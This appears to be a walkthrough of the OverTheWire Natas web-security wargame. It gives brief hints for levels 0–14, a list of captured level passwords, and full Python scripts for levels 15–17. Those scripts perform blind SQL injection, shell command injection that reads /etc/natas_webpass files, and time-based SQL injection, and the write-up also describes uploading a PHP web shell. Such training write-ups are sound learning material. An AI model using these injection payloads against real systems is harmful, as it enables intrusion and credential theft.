natas_levels

Level 0

Password is in the comments.

Level 1

Open inspect element through keyboard shortcut and remove the oncontextmenu line from the body tag.

Level 2

When you view the source it shows a files/pixel.png element present on the page. That implies that there is a file folder in the server directory. Open the folder and see the file contents.

Level 3

Open robots.txt and see the disallowed folder. This is checked by web crawlers to see what folders to not index.

Level 4

Change referer by setting up a proxy to localhost and then using mitmproxy.

Level 5

Change cookie by setting up localhost proxy and using mitmproxy.

Level 6

The PHP sauce has the file that has the secret word necessary for revealing the password.

Level 7

Check the HTML. It has a comment stating the page that has the password. Use that as a query in the URL to view the page.

Level 8

Check the PHP source they are providing. Get the string from the hexadecimal, reverse it, and do a base64 decode on it.

Level 9

Comment out the query and grep the file that has the password since the input goes unsantized to passthru.

Level 10

Do the same as before. Asterisk, period and forward slashes are not there in the filtered characters.

Level 11

base64 decode the data cookie. XOR it with the given cookie to get the XOR key. Once the key is received use it to change the cookie value to yes and encrypt it. Then send that as the cookie.

Level 12

Create a .php file to cat the password. Change the html to send a php through the form instead of a jpg. Send it and open it in the browser.

Level 13

Add the JPEG magic bytes to the raw hexdump of the file. Then upload it.

Level 14

Comment out the sql query ahead of the username.

Level 15

#!/bin/python
import requests

url = "http://natas15.natas.labs.overthewire.org"
auth_username = "natas15"
auth_password = "TTkaI7AWG4iDERztBcEyKV7kRXH1EZRB"

characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"

password = ""

iter = 1

test = True
while test:
    test = False
    for i in characters:
        uri = url + "?debug=true"
        r = requests.get(
            uri,
            auth=(auth_username, auth_password),
            params={
                "username": 'natas16" and SUBSTR(password, 1, '
                + str(iter)
                + ')="'
                + password
                + i
            },
        )
        # print(r.text)
        # print("Letter", i, r.elapsed.total_seconds())
        if "exists" in r.text:
            test = True
            iter += 1
            password += i
            print("password:", password, flush=True)

print("password:", password)

Level 16

#!/usr/bin/python

import requests
import string

url = "http://natas16.natas.labs.overthewire.org"
auth_username = "natas16"
auth_password = "TRD7iZrd5gATjj9PkPEuaOlfEjHqj32V"

characters = string.ascii_letters + string.digits

# print(characters)

default_needle = "Africans"

password_chars = ""

iter = 1

print("chars = ", end="")

for i in characters:
    r = requests.get(
        url,
        auth=(auth_username, auth_password),
        params={
            "needle": default_needle + "$(grep " + i + " /etc/natas_webpass/natas17)"
        },
    )
    # print(r.text)
    if default_needle not in r.text:
        password_chars += i
        print(i, end="", flush=True)

print()

print("password chars = ", password_chars)
password = ""

while True:
    for i in password_chars:
        r = requests.get(
            url,
            auth=(auth_username, auth_password),
            params={
                "needle": default_needle
                + "$(grep ^"
                + password
                + i
                + " /etc/natas_webpass/natas17)"
            },
        )
        if default_needle not in r.text:
            password += i
            print(password)

A post method can also be used for this.

Level 17

#!/bin/python
import requests

url = "http://natas17.natas.labs.overthewire.org"
auth_username = "natas17"
auth_password = "XkEuChE0SbnKBvH1RU7ksIb9uuLmI7sd"

characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"

password = ""

iter = 1

test = True
while test:
    test = False
    for i in characters:
        uri = url + "?debug=true"
        r = requests.get(
            uri,
            auth=(auth_username, auth_password),
            params={
                "username": "natas18\" and IF(SUBSTR(password, 1, "
                + str(iter)
                + ")=\""
                + password
                + i
                + "\", sleep(6), FALSE) and username = \"natas18"
            },
        )
        # print(r.text)
        print("Letter", i, r.elapsed.total_seconds())
        if r.elapsed.total_seconds() > 6:
            test = True
            iter += 1
            password += i
            print("password:", password, flush=True)

print("password:", password)

Timing attack basically.


  • natas 8: a6bZCNYwdKqN5cGP11ZdtPg0iImQQhAB
  • natas 11: 1KFqoJXi6hRaPluAmk8ESDW4fSysRoIg
  • natas 12: YWqo0pjpcXzSIl5NMAVxg12QxeC1w9QG
  • natas 14: qPazSJBmrmU7UQJv17MHk1PGC4DxZMEP
  • natas 16: TRD7iZrd5gATjj9PkPEuaOlfEjHqj32V
  • natas 18: 8nEduUXg8kFGPV84uLWvzKgn6oKjq6aq